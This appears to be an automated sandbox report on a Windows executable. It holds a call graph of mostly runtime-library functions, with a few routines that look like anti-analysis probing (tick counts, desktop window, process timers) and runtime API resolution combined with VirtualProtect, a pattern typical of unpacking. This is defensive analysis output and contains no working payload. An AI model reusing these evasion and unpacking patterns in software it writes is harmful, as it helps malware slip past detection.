401aaa __init_pointers 67 API calls 4246->4247 4248 401b1f 4247->4248 4248->4243 4250 4023a5 4249->4250 4251 4023ca 4249->4251 4250->4238 4253 403416 RtlLeaveCriticalSection 4250->4253 4254 403416 RtlLeaveCriticalSection 4251->4254 4253->4241 4254->4250 4255 402c5b 4270 402f98 4255->4270 4257 402c67 GetStartupInfoA 4258 404032 __calloc_crt 67 API calls 4257->4258 4264 402c88 4258->4264 4259 402e92 _raise 4260 402e0f GetStdHandle 4265 402dd9 4260->4265 4261 404032 __calloc_crt 67 API calls 4261->4264 4262 402e74 SetHandleCount 4262->4259 4263 402e21 GetFileType 4263->4265 4264->4259 4264->4261 4264->4265 4267 402d5c 4264->4267 4265->4259 4265->4260 4265->4262 4265->4263 4266 404763 ___crtInitCritSecAndSpinCount 67 API calls 4265->4266 4266->4265 4267->4259 4267->4265 4268 402d85 GetFileType 4267->4268 4269 404763 ___crtInitCritSecAndSpinCount 67 API calls 4267->4269 4268->4267 4269->4267 4270->4257 4840 40279d 4841 4027a9 4840->4841 4845 4027ae 4840->4845 4842 403f46 ___initmbctable 111 API calls 4841->4842 4842->4845 4843 4027ea 4844 404cc7 __wincmdln 77 API calls 4844->4845 4845->4843 4845->4844 4271 401863 4274 40263f 4271->4274 4275 401cc6 _raise 67 API calls 4274->4275 4276 401874 4275->4276 4277 402265 4278 40226e __except_handler4 4277->4278 4283 4043c5 4278->4283 4280 40228d __initterm_e 4282 4022ae __except_handler4 4280->4282 4287 4043b3 4280->4287 4284 4043c9 4283->4284 4285 401aaa __init_pointers 67 API calls 4284->4285 4286 4043e1 4284->4286 4285->4284 4286->4280 4290 404377 4287->4290 4289 4043bc 4289->4282 4291 404383 _raise 4290->4291 4298 4021a8 4291->4298 4297 4043a4 _raise 4297->4289 4299 4034ee __lock 67 API calls 4298->4299 4300 4021af 4299->4300 4301 40428f 4300->4301 4302 401b21 __amsg_exit 67 API calls 4301->4302 4303 40429f 4302->4303 4304 401b21 __amsg_exit 67 API calls 4303->4304 4305 4042b0 4304->4305 4312 404333 4305->4312 4321 406b43 4305->4321 4307 401aaa __init_pointers 67 API calls 4308 404328 4307->4308 4310 401aaa __init_pointers 67 API calls 4308->4310 4309 4042ce 4313 4042f0 4309->4313 4317 404319 4309->4317 4334 40407a 4309->4334 4310->4312 4318 4043ad 4312->4318 4313->4312 4314 40407a __realloc_crt 73 API calls 4313->4314 4315 404307 4313->4315 4314->4315 4315->4312 4316 401aaa __init_pointers 67 API calls 4315->4316 4316->4317 4317->4307 4383 4021b1 4318->4383 4322 406b4f _raise 4321->4322 4323 406b7c 4322->4323 4324 406b5f 4322->4324 4326 406bbd RtlSizeHeap 4323->4326 4328 4034ee __lock 67 API calls 4323->4328 4325 40427c _strcat_s 67 API calls 4324->4325 4327 406b64 4325->4327 4330 406b74 _raise 4326->4330 4329 40421d _strcat_s 67 API calls 4327->4329 4331 406b8c ___sbh_find_block 4328->4331 4329->4330 4330->4309 4339 406bdd 4331->4339 4337 40407e 4334->4337 4336 4040c0 4336->4313 4337->4336 4338 4040a1 Sleep 4337->4338 4343 406835 4337->4343 4338->4337 4342 403416 RtlLeaveCriticalSection 4339->4342 4341 406bb8 4341->4326 4341->4330 4342->4341 4344 406841 _raise 4343->4344 4345 406856 4344->4345 4346 406848 4344->4346 4348 406869 4345->4348 4349 40685d 4345->4349 4347 406654 _malloc 67 API calls 4346->4347 4370 406850 _raise _realloc 4347->4370 4355 4069db 4348->4355 4367 406876 ___sbh_resize_block ___sbh_find_block ___crtGetEnvironmentStringsA 4348->4367 4350 403f64 __freea 67 API calls 4349->4350 4350->4370 4351 406a0e 4354 404832 _malloc 67 API calls 4351->4354 4352 4069e0 RtlReAllocateHeap 4352->4355 4352->4370 4353 4034ee __lock 67 API calls 4353->4367 4356 406a14 4354->4356 4355->4351 4355->4352 4357 406a32 4355->4357 4359 404832 _malloc 67 API calls 4355->4359 4362 406a28 4355->4362 4358 40427c _strcat_s 67 API calls 4356->4358 4360 40427c _strcat_s 67 API calls 4357->4360 4357->4370 4358->4370 4359->4355 4361 406a3b GetLastError 4360->4361 4361->4370 4364 40427c _strcat_s 67 API calls 4362->4364 4377 4069a9 4364->4377 4365 406901 RtlAllocateHeap 4365->4367 4366 406956 RtlReAllocateHeap 4366->4367 4367->4351 4367->4353 4367->4365 4367->4366 4369 405861 ___sbh_alloc_block 5 API calls 4367->4369 4367->4370 4371 4069c1 4367->4371 4372 404832 _malloc 67 API calls 4367->4372 4375 4069a4 4367->4375 4378 4050b8 __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 4367->4378 4379 406979 4367->4379 4368 4069ae GetLastError 4368->4370 4369->4367 4370->4337 4371->4370 4373 40427c _strcat_s 67 API calls 4371->4373 4372->4367 4374 4069ce 4373->4374 4374->4361 4374->4370 4376 40427c _strcat_s 67 API calls 4375->4376 4376->4377 4377->4368 4377->4370 4378->4367 4382 403416 RtlLeaveCriticalSection 4379->4382 4381 406980 4381->4367 4382->4381 4386 403416 RtlLeaveCriticalSection 4383->4386 4385 4021b8 4385->4297 4386->4385 4846 402b26 4847 402b42 GetEnvironmentStringsW 4846->4847 4848 402b61 4846->4848 4849 402b56 GetLastError 4847->4849 4850 402b4a 4847->4850 4848->4850 4851 402bfc 4848->4851 4849->4848 4852 402b8b WideCharToMultiByte 4850->4852 4853 402b7c GetEnvironmentStringsW 4850->4853 4854 402c04 GetEnvironmentStrings 4851->4854 4855 402b84 4851->4855 4858 402bf1 FreeEnvironmentStringsW 4852->4858 4859 402bbf 4852->4859 4853->4852 4853->4855 4854->4855 4856 402c14 4854->4856 4861 403ff2 __malloc_crt 67 API calls 4856->4861 4858->4855 4860 403ff2 __malloc_crt 67 API calls 4859->4860 4863 402bc5 4860->4863 4862 402c2d 4861->4862 4864 402c40 ___crtGetEnvironmentStringsA 4862->4864 4865 402c34 FreeEnvironmentStringsA 4862->4865 4863->4858 4866 402bce WideCharToMultiByte 4863->4866 4869 402c48 FreeEnvironmentStringsA 4864->4869 4865->4855 4867 402be8 4866->4867 4868 402bdf 4866->4868 4867->4858 4870 403f64 __freea 67 API calls 4868->4870 4869->4855 4870->4867 4871 4210ae 4873 4210cd 4871->4873 4874 42115b 4873->4874 4876 421170 4874->4876 4877 4018b6 4876->4877 4878 403196 ___security_init_cookie 5 API calls 4877->4878 4879 4016d6 _raise 4878->4879 4880 4016e2 GetStartupInfoA GetProcessHeap RtlAllocateHeap 4879->4880 4881 401714 4880->4881 4882 401671 _fast_error_exit 67 API calls 4881->4882 4883 40171b _raise 4882->4883 4390 402a6d 4391 402a80 4390->4391 4392 402a85 GetModuleFileNameA 4390->4392 4401 403f46 4391->4401 4394 402aac 4392->4394 4405 4028d5 4394->4405 4396 402b08 4398 403ff2 __malloc_crt 67 API calls 4399 402aee 4398->4399 4399->4396 4400 4028d5 _parse_cmdline 77 API calls 4399->4400 4400->4396 4402 403f56 4401->4402 4403 403f4f 4401->4403 4402->4392 4411 403dac 4403->4411 4407 4028f2 4405->4407 4409 40295f 4407->4409 4663 404cc7 4407->4663 4408 402a5d 4408->4396 4408->4398 4409->4408 4410 404cc7 77 API calls __wincmdln 4409->4410 4410->4409 4412 403db8 _raise 4411->4412 4413 401d3d _LocaleUpdate::_LocaleUpdate 67 API calls 4412->4413 4414 403dc1 4413->4414 4442 403a33 4414->4442 4416 403dcb 4458 403b59 4416->4458 4419 403ff2 __malloc_crt 67 API calls 4420 403dec 4419->4420 4421 403f0b _raise 4420->4421 4465 403bd3 4420->4465 4421->4402 4424 403f18 4424->4421 4429 403f64 __freea 67 API calls 4424->4429 4433 403f2b 4424->4433 4425 403e1c InterlockedDecrement 4426 403e2c 4425->4426 4427 403e3d InterlockedIncrement 4425->4427 4426->4427 4431 403f64 __freea 67 API calls 4426->4431 4427->4421 4428 403e53 4427->4428 4428->4421 4432 4034ee __lock 67 API calls 4428->4432 4429->4433 4430 40427c _strcat_s 67 API calls 4430->4421 4434 403e3c 4431->4434 4436 403e67 InterlockedDecrement 4432->4436 4433->4430 4434->4427 4437 403ee3 4436->4437 4438 403ef6 InterlockedIncrement 4436->4438 4437->4438 4440 403f64 __freea 67 API calls 4437->4440 4475 403f0d 4438->4475 4441 403ef5 4440->4441 4441->4438 4443 403a3f _raise 4442->4443 4444 401d3d _LocaleUpdate::_LocaleUpdate 67 API calls 4443->4444 4445 403a44 4444->4445 4446 4034ee __lock 67 API calls 4445->4446 4447 403a56 4445->4447 4448 403a74 4446->4448 4450 403a64 _raise 4447->4450 4454 402149 __amsg_exit 67 API calls 4447->4454 4449 403abd 4448->4449 4451 403aa5 InterlockedIncrement 4448->4451 4452 403a8b InterlockedDecrement 4448->4452 4478 403ace 4449->4478 4450->4416 4451->4449 4452->4451 4455 403a96 4452->4455 4454->4450 4455->4451 4456 403f64 __freea 67 API calls 4455->4456 4457 403aa4 4456->4457 4457->4451 4482 403ad7 4458->4482 4461 403b94 4463 403b99 GetACP 4461->4463 4464 403b86 4461->4464 4462 403b76 GetOEMCP 4462->4464 4463->4464 4464->4419 4464->4421 4466 403b59 getSystemCP 79 API calls 4465->4466 4467 403bf1 4466->4467 4468 403bfc setSBCS 4467->4468 4471 403c40 IsValidCodePage 4467->4471 4474 403c65 _memset __setmbcp 4467->4474 4469 401662 setSBUpLow 5 API calls 4468->4469 4470 403daa 4469->4470 4470->4424 4470->4425 4471->4468 4472 403c52 GetCPInfo 4471->4472 4472->4468 4472->4474 4517 4038a9 GetCPInfo 4474->4517 4662 403416 RtlLeaveCriticalSection 4475->4662 4477 403f14 4477->4421 4481 403416 RtlLeaveCriticalSection 4478->4481 4480 403ad5 4480->4447 4481->4480 4483 403ae6 4482->4483 4489 403b33 4482->4489 4484 401d3d _LocaleUpdate::_LocaleUpdate 67 API calls 4483->4484 4485 403aeb 4484->4485 4486 403b13 4485->4486 4490 4037af 4485->4490 4488 403a33 _LocaleUpdate::_LocaleUpdate 69 API calls 4486->4488 4486->4489 4488->4489 4489->4461 4489->4462 4491 4037bb _raise 4490->4491 4492 401d3d _LocaleUpdate::_LocaleUpdate 67 API calls 4491->4492 4493 4037c0 4492->4493 4494 4037ee 4493->4494 4496 4037d2 4493->4496 4495 4034ee __lock 67 API calls 4494->4495 4497 4037f5 4495->4497 4498 401d3d _LocaleUpdate::_LocaleUpdate 67 API calls 4496->4498 4505 403771 4497->4505 4500 4037d7 4498->4500 4503 4037e5 _raise 4500->4503 4504 402149 __amsg_exit 67 API calls 4500->4504 4503->4486 4504->4503 4506 403775 4505->4506 4507 4037a7 4505->4507 4506->4507 4508 40365f ___addlocaleref 8 API calls 4506->4508 4513 403819 4507->4513 4509 403788 4508->4509 4509->4507 4510 4036e5 ___removelocaleref 8 API calls 4509->4510 4511 403793 4510->4511 4511->4507 4512 40351f ___freetlocinfo 67 API calls 4511->4512 4512->4507 4516 403416 RtlLeaveCriticalSection 4513->4516 4515 403820 4515->4500 4516->4515 4518 4038e0 _memset 4517->4518 4519 403989 4517->4519 4527 406192 4518->4527 4522 401662 setSBUpLow 5 API calls 4519->4522 4524 403a2b 4522->4524 4524->4474 4526 4065c2 ___crtLCMapStringA 102 API calls 4526->4519 4528 403ad7 _LocaleUpdate::_LocaleUpdate 77 API calls 4527->4528 4529 4061a3 4528->4529 4537 405fda 4529->4537 4532 4065c2 4533 403ad7 _LocaleUpdate::_LocaleUpdate 77 API calls 4532->4533 4534 4065d3 4533->4534 4615 406220 4534->4615 4538 406024 4537->4538 4539 405ff9 GetStringTypeW 4537->4539 4540 406011 4538->4540 4542 40610b 4538->4542 4539->4540 4541 406019 GetLastError 4539->4541 4543 40605d MultiByteToWideChar 4540->4543 4560 406105 4540->4560 4541->4538 4565 406e83 GetLocaleInfoA 4542->4565 4549 40608a 4543->4549 4543->4560 4545 401662 setSBUpLow 5 API calls 4547 403944 4545->4547 4547->4532 4548 40615c GetStringTypeA 4552 406177 4548->4552 4548->4560 4553 40609f _memset __alloca_probe_16 4549->4553 4554 406654 _malloc 67 API calls 4549->4554 4551 4060d8 MultiByteToWideChar 4556 4060ee GetStringTypeW 4551->4556 4557 4060ff 4551->4557 4558 403f64 __freea 67 API calls 4552->4558 4553->4551 4553->4560 4554->4553 4556->4557 4561 405ef0 4557->4561 4558->4560 4560->4545 4562 405f09 4561->4562 4563 405ef8 4561->4563 4562->4560 4563->4562 4564 403f64 __freea 67 API calls 4563->4564 4564->4562 4566 406eb4 4565->4566 4567 406eaf 4565->4567 4596 406e72 4566->4596 4569 401662 setSBUpLow 5 API calls 4567->4569 4570 40612f 4569->4570 4570->4548 4570->4560 4571 406eca 4570->4571 4572 406f08 GetCPInfo 4571->4572 4576 406f92 4571->4576 4573 406f7d MultiByteToWideChar 4572->4573 4574 406f1f 4572->4574 4573->4576 4578 406f38 _strlen 4573->4578 4574->4573 4577 406f25 GetCPInfo 4574->4577 4575 401662 setSBUpLow 5 API calls 4579 406150 4575->4579 4576->4575 4577->4573 4580 406f32 4577->4580 4581 406f6a _memset __alloca_probe_16 4578->4581 4582 406654 _malloc 67 API calls 4578->4582 4579->4548 4579->4560 4580->4573 4580->4578 4581->4576 4583 406fc7 MultiByteToWideChar 4581->4583 4582->4581 4584 406ffe 4583->4584 4585 406fdf 4583->4585 4586 405ef0 __freea 67 API calls 4584->4586 4587 407003 4585->4587 4588 406fe6 WideCharToMultiByte 4585->4588 4586->4576 4589 407022 4587->4589 4590 40700e WideCharToMultiByte 4587->4590 4588->4584 4591 404032 __calloc_crt 67 API calls 4589->4591 4590->4584 4590->4589 4592 40702a 4591->4592 4592->4584 4593 407033 WideCharToMultiByte 4592->4593 4593->4584 4594 407045 4593->4594 4595 403f64 __freea 67 API calls 4594->4595 4595->4584 4599 407396 4596->4599 4600 4073ad 4599->4600 4603 40716b 4600->4603 4604 403ad7 _LocaleUpdate::_LocaleUpdate 77 API calls 4603->4604 4607 40717e 4604->4607 4605 407190 4606 40427c _strcat_s 67 API calls 4605->4606 4608 407195 4606->4608 4607->4605 4611 4071cd 4607->4611 4609 40421d _strcat_s 67 API calls 4608->4609 4614 406e7f 4609->4614 4610 40707c __isctype_l 91 API calls 4610->4611 4611->4610 4612 407212 4611->4612 4613 40427c _strcat_s 67 API calls 4612->4613 4612->4614 4613->4614 4614->4567 4616 40623f LCMapStringW 4615->4616 4620 40625a 4615->4620 4617 406262 GetLastError 4616->4617 4616->4620 4617->4620 4618 406457 4622 406e83 ___ansicp 91 API calls 4618->4622 4619 4062b4 4621 4062cd MultiByteToWideChar 4619->4621 4644 40644e 4619->4644 4620->4618 4620->4619 4630 4062fa 4621->4630 4621->4644 4624 40647f 4622->4624 4623 401662 setSBUpLow 5 API calls 4625 403964 4623->4625 4626 406573 LCMapStringA 4624->4626 4627 406498 4624->4627 4624->4644 4625->4526 4661 4064cf 4626->4661 4628 406eca ___convertcp 74 API calls 4627->4628 4632 4064aa 4628->4632 4629 40634b MultiByteToWideChar 4633 406364 LCMapStringW 4629->4633 4655 406445 4629->4655 4631 406654 _malloc 67 API calls 4630->4631 4639 406313 __alloca_probe_16 4630->4639 4631->4639 4635 4064b4 LCMapStringA 4632->4635 4632->4644 4637 406385 4633->4637 4633->4655 4634 40659a 4641 403f64 __freea 67 API calls 4634->4641 4634->4644 4647 4064d6 4635->4647 4635->4661 4636 405ef0 __freea 67 API calls 4636->4644 4640 40638d 4637->4640 4646 4063b6 4637->4646 4638 403f64 __freea 67 API calls 4638->4634 4639->4629 4639->4644 4645 40639f LCMapStringW 4640->4645 4640->4655 4641->4644 4642 4064e7 _memset __alloca_probe_16 4654 406525 LCMapStringA 4642->4654 4642->4661 4643 4063d1 __alloca_probe_16 4648 406405 LCMapStringW 4643->4648 4643->4655 4644->4623 4645->4655 4646->4643 4649 406654 _malloc 67 API calls 4646->4649 4647->4642 4650 406654 _malloc 67 API calls 4647->4650 4651 40641d WideCharToMultiByte 4648->4651 4652 40643f 4648->4652 4649->4643 4650->4642 4651->4652 4653 405ef0 __freea 67 API calls 4652->4653 4653->4655 4656 406541 4654->4656 4657 406545 4654->4657 4655->4636 4660 405ef0 __freea 67 API calls 4656->4660 4659 406eca ___convertcp 74 API calls 4657->4659 4659->4656 4660->4661 4661->4634 4661->4638 4662->4477 4666 404c76 4663->4666 4667 403ad7 _LocaleUpdate::_LocaleUpdate 77 API calls 4666->4667 4668 404c87 4667->4668 4668->4407 4669 406bf0 RtlUnwind 4670 4040f1 4671 4040f4 4670->4671 4674 406a50 4671->4674 4675 406a75 4674->4675 4676 406a7c 4674->4676 4677 402465 __amsg_exit 67 API calls 4675->4677 4686 404578 4676->4686 4677->4676 4680 406a8d _memset 4682 406b3b 4680->4682 4685 406b10 SetUnhandledExceptionFilter UnhandledExceptionFilter 4680->4685 4710 4023ea 4682->4710 4685->4682 4687 401b21 __amsg_exit 67 API calls 4686->4687 4688 404583 4687->4688 4688->4680 4689 404585 4688->4689 4692 404591 _raise 4689->4692 4690 4045ed 4691 4045ce 4690->4691 4696 4045fc 4690->4696 4695 401b21 __amsg_exit 67 API calls 4691->4695 4692->4690 4692->4691 4693 4045b8 4692->4693 4699 4045b4 4692->4699 4694 401cc6 _raise 67 API calls 4693->4694 4697 4045bd _siglookup 4694->4697 4695->4697 4698 40427c _strcat_s 67 API calls 4696->4698 4701 404663 4697->4701 4703 4023ea _raise 67 API calls 4697->4703 4704 4045c6 _raise 4697->4704 4700 404601 4698->4700 4699->4693 4699->4696 4702 40421d _strcat_s 67 API calls 4700->4702 4705 4034ee __lock 67 API calls 4701->4705 4706 40466e 4701->4706 4702->4704 4703->4701 4704->4680 4705->4706 4707 401b18 _raise 67 API calls 4706->4707 4708 4046a3 4706->4708 4707->4708 4713 4046f9 4708->4713 4711 4022f7 _raise 67 API calls 4710->4711 4712 4023f7 4711->4712 4714 404706 4713->4714 4715 4046ff 4713->4715 4714->4704 4717 403416 RtlLeaveCriticalSection 4715->4717 4717->4714 4718 401e76 GetModuleHandleA 4719 401e91 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4718->4719 4720 401e88 4718->4720 4722 401edb TlsAlloc 4719->4722 4751 401bca 4720->4751 4725 401ff5 4722->4725 4726 401f29 TlsSetValue 4722->4726 4726->4725 4727 401f3a 4726->4727 4762 402419 4727->4762 4730 401aaa __init_pointers 67 API calls 4731 401f4a 4730->4731 4732 401aaa __init_pointers 67 API calls 4731->4732 4733 401f5a 4732->4733 4734 401aaa __init_pointers 67 API calls 4733->4734 4735 401f6a 4734->4735 4736 401aaa __init_pointers 67 API calls 4735->4736 4737 401f7a 4736->4737 4769 403378 4737->4769 4740 401ff0 4741 401bca __mtterm 70 API calls 4740->4741 4741->4725 4742 401b21 __amsg_exit 67 API calls 4743 401f9b 4742->4743 4743->4740 4744 404032 __calloc_crt 67 API calls 4743->4744 4745 401fb4 4744->4745 4745->4740 4746 401b21 __amsg_exit 67 API calls 4745->4746 4747 401fce 4746->4747 4747->4740 4748 401fd5 4747->4748 4749 401c07 _raise 67 API calls 4748->4749 4750 401fdd GetCurrentThreadId 4749->4750 4750->4725 4752 401bd4 4751->4752 4753 401be0 4751->4753 4755 401b21 __amsg_exit 67 API calls 4752->4755 4754 401bf4 TlsFree 4753->4754 4756 401c02 4753->4756 4754->4756 4755->4753 4757 4033db RtlDeleteCriticalSection 4756->4757 4758 4033f3 4756->4758 4759 403f64 __freea 67 API calls 4757->4759 4760 403405 RtlDeleteCriticalSection 4758->4760 4761 401e8d 4758->4761 4759->4756 4760->4758 4763 401b18 _raise 67 API calls 4762->4763 4764 40241f __init_pointers 4763->4764 4773 404106 4764->4773 4767 401aaa __init_pointers 67 API calls 4768 401f3f 4767->4768 4768->4730 4770 403381 4769->4770 4771 404763 ___crtInitCritSecAndSpinCount 67 API calls 4770->4771 4772 401f87 4770->4772 4771->4770 4772->4740 4772->4742 4774 401aaa __init_pointers 67 API calls 4773->4774 4775 402451 4774->4775 4775->4767 4776 401877 4777 401886 4776->4777 4778 40188c 4776->4778 4779 4023ea _raise 67 API calls 4777->4779 4782 40240a 4778->4782 4779->4778 4781 401891 _raise 4783 4022f7 _raise 67 API calls 4782->4783 4784 402415 4783->4784 4784->4781 4785 4027fa 4786 402807 4785->4786 4790 40280c _strlen 4785->4790 4787 403f46 ___initmbctable 111 API calls 4786->4787 4787->4790 4788 402818 4789 404032 __calloc_crt 67 API calls 4797 40283f _strlen 4789->4797 4790->4788 4790->4789 4791 40289a 4792 403f64 __freea 67 API calls 4791->4792 4792->4788 4793 404032 __calloc_crt 67 API calls 4793->4797 4794 4028bf 4795 403f64 __freea 67 API calls 4794->4795 4795->4788 4796 404bcb _strcpy_s 67 API calls 4796->4797 4797->4788 4797->4791 4797->4793 4797->4794 4797->4796 4798 404121 __invoke_watson 10 API calls 4797->4798 4798->4797 4799 4023fb 4800 4022f7 _raise 67 API calls 4799->4800 4801 402406 4800->4801 4884 40213b SetUnhandledExceptionFilter 3989 402f3e HeapCreate 3990 402f61 3989->3990 3991 402f5e 3989->3991 3998 402ee3 3990->3998 3994 402f94 3997 402f7f HeapDestroy 3997->3991 3999 4021f2 ___crtInitCritSecAndSpinCount 67 API calls 3998->3999 4000 402efa 3999->4000 4001 402f09 4000->4001 4002 404121 __invoke_watson 10 API calls 4000->4002 4003 402229 __init_pointers 67 API calls 4001->4003 4002->4001 4004 402f15 4003->4004 4005 402f24 4004->4005 4006 404121 __invoke_watson 10 API calls 4004->4006 4005->3994 4007 405045 RtlAllocateHeap 4005->4007 4006->4005 4008 402f7a 4007->4008 4008->3994 4008->3997 4802 4020fe 4803 402136 4802->4803 4805 40210c 4802->4805 4805->4803 4806 4040cd 4805->4806 4807 4040d9 _raise 4806->4807 4808 401d3d _LocaleUpdate::_LocaleUpdate 67 API calls 4807->4808 4810 4040de 4808->4810 4809 406a50 _abort 69 API calls 4811 404100 _raise 4809->4811 4810->4809 4811->4803

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 90 4012c0-4012e8 FindFirstFileA call 401080
                          APIs
                          • FindFirstFileA.KERNELBASE(ks clku .d,E61B8D13), ref: 004012DD
                            • Part of subcall function 00401080: GetTickCount.KERNEL32 ref: 00401096
                            • Part of subcall function 00401080: GetDesktopWindow.USER32 ref: 004010B8
                            • Part of subcall function 00401080: GetClassNameA.USER32(00000000,00000000,00000400), ref: 004010CC
                            • Part of subcall function 00401080: GlobalAlloc.KERNELBASE(00000000,000F6950), ref: 004010EE
                            • Part of subcall function 00401080: GetCurrentProcess.KERNEL32(?), ref: 0040114B
                            • Part of subcall function 00401080: GetProcessIoCounters.KERNEL32(00000000), ref: 0040114E
                            • Part of subcall function 00401080: GetCurrentProcess.KERNEL32(?,?,?,?), ref: 004011B9
                            • Part of subcall function 00401080: GetProcessTimes.KERNELBASE(00000000), ref: 004011BC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1641140611.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1641121132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1641140611.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1641183888.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Process$Current$AllocClassCountCountersDesktopFileFindFirstGlobalNameTickTimesWindow
                          • String ID: ks clku .d
                          • API String ID: 973805369-4096487313
                          • Opcode ID: f572dfb4ccbad4a63051ea1b90dc6402510860d94203dc7c9fb76134c3d65c66
                          • Instruction ID: 8201e92c16030f82e268503128fd01f75d7624b5287a074f0a6a6b49dcde2be8
                          • Opcode Fuzzy Hash: f572dfb4ccbad4a63051ea1b90dc6402510860d94203dc7c9fb76134c3d65c66
                          • Instruction Fuzzy Hash: 13C012701042448FC330AF24DE0ABAA37E4AB48300F00093AA5E8E60A4DA3455598A8A

                          Control-flow Graph

                          APIs
                          • GetTickCount.KERNEL32 ref: 00401096
                          • GetDesktopWindow.USER32 ref: 004010B8
                          • GetClassNameA.USER32(00000000,00000000,00000400), ref: 004010CC
                          • GlobalAlloc.KERNELBASE(00000000,000F6950), ref: 004010EE
                          • GetCurrentProcess.KERNEL32(?), ref: 0040114B
                          • GetProcessIoCounters.KERNEL32(00000000), ref: 0040114E
                          • GetCurrentProcess.KERNEL32(?,?,?,?), ref: 004011B9
                          • GetProcessTimes.KERNELBASE(00000000), ref: 004011BC
                          Strings
                          • cjkU dklu UUido c;aopi quio ,mvnciu cxklnsp, xrefs: 00401131
                          Memory Dump Source
                          • Source File: 00000000.00000002.1641140611.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1641121132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1641140611.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1641183888.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Process$Current$AllocClassCountCountersDesktopGlobalNameTickTimesWindow
                          • String ID: cjkU dklu UUido c;aopi quio ,mvnciu cxklnsp
                          • API String ID: 509927810-2920797944
                          • Opcode ID: e0b8abb97aa25d1df5e5a951dd4f26f151847d18626d26f9063e3e0a3aa5dc8f
                          • Instruction ID: 30898c1c04428891cb82ceb7e239a2b08516cd6c9376f1465321758e23d54b14
                          • Opcode Fuzzy Hash: e0b8abb97aa25d1df5e5a951dd4f26f151847d18626d26f9063e3e0a3aa5dc8f
                          • Instruction Fuzzy Hash: E55127F1D041744BDB288B298D54BB9BBF5ABC5305F0881BEE689B7381D5385A48CF28

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 17 407a98-407a9f GetModuleHandleA 18 407aa1-407ab0 call 407ab5 17->18 19 407adf 17->19 29 407ab2-407abd GetProcAddress 18->29 30 407b17 18->30 20 407ae1-407ae5 19->20 22 407b24 call 407b29 20->22 23 407ae7-407aef GetModuleHandleA 20->23 26 407af1-407af9 23->26 26->26 28 407afb-407afe 26->28 28->20 31 407b00-407b02 28->31 29->19 33 407abf-407acc VirtualProtect 29->33 32 407b18-407b20 30->32 36 407b04-407b06 31->36 37 407b08-407b10 31->37 41 407b22 32->41 34 407ade 33->34 35 407ace-407adc VirtualProtect 33->35 34->19 35->34 39 407b11-407b12 GetProcAddress 36->39 37->39 39->30 41->28
                          APIs
                          • GetModuleHandleA.KERNEL32(00407A8F), ref: 00407A98
                          • GetModuleHandleA.KERNEL32(?,00407A8F), ref: 00407AEA
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00407B12
                            • Part of subcall function 00407AB5: GetProcAddress.KERNEL32(00000000,00407AA6), ref: 00407AB6
                            • Part of subcall function 00407AB5: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00407AA6,00407A8F), ref: 00407AC8
                            • Part of subcall function 00407AB5: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00407AA6,00407A8F), ref: 00407ADC
                          Memory Dump Source
                          • Source File: 00000000.00000002.1641140611.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1641121132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1641140611.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1641183888.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProcProtectVirtual
                          • String ID:
                          • API String ID: 2099061454-0
                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                          • Instruction ID: 53099f65029657388ac4b193d9ffb221688749bb3c6439a8311ebbe5e3b7996f
                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                          • Instruction Fuzzy Hash: B501CC00F4D24539DA2051754C0197F7AA89A533687141677A111B72D3D9BCBE0692BF

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 42 407a59-407a6e 43 407a70-407a78 42->43 44 407adf 42->44 43->44 46 407a7a-407aa8 call 407a98 43->46 45 407ae1-407ae5 44->45 47 407b24 call 407b29 45->47 48 407ae7-407aef GetModuleHandleA 45->48 54 407aaa 46->54 55 407b1e-407b20 46->55 51 407af1-407af9 48->51 51->51 53 407afb-407afe 51->53 53->45 56 407b00-407b02 53->56 57 407aac-407ab0 54->57 58 407b0d-407b10 54->58 59 407b22 55->59 60 407b18-407b1d 55->60 61 407b04-407b06 56->61 62 407b08-407b0c 56->62 65 407b17 57->65 66 407ab2-407abd GetProcAddress 57->66 63 407b11-407b12 GetProcAddress 58->63 59->53 60->55 61->63 62->58 63->65 65->60 66->44 67 407abf-407acc VirtualProtect 66->67 68 407ade 67->68 69 407ace-407adc VirtualProtect 67->69 68->44 69->68
                          APIs
                          • GetModuleHandleA.KERNEL32(?,00407A8F), ref: 00407AEA
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00407B12
                            • Part of subcall function 00407A98: GetModuleHandleA.KERNEL32(00407A8F), ref: 00407A98
                            • Part of subcall function 00407A98: GetProcAddress.KERNEL32(00000000,00407AA6), ref: 00407AB6
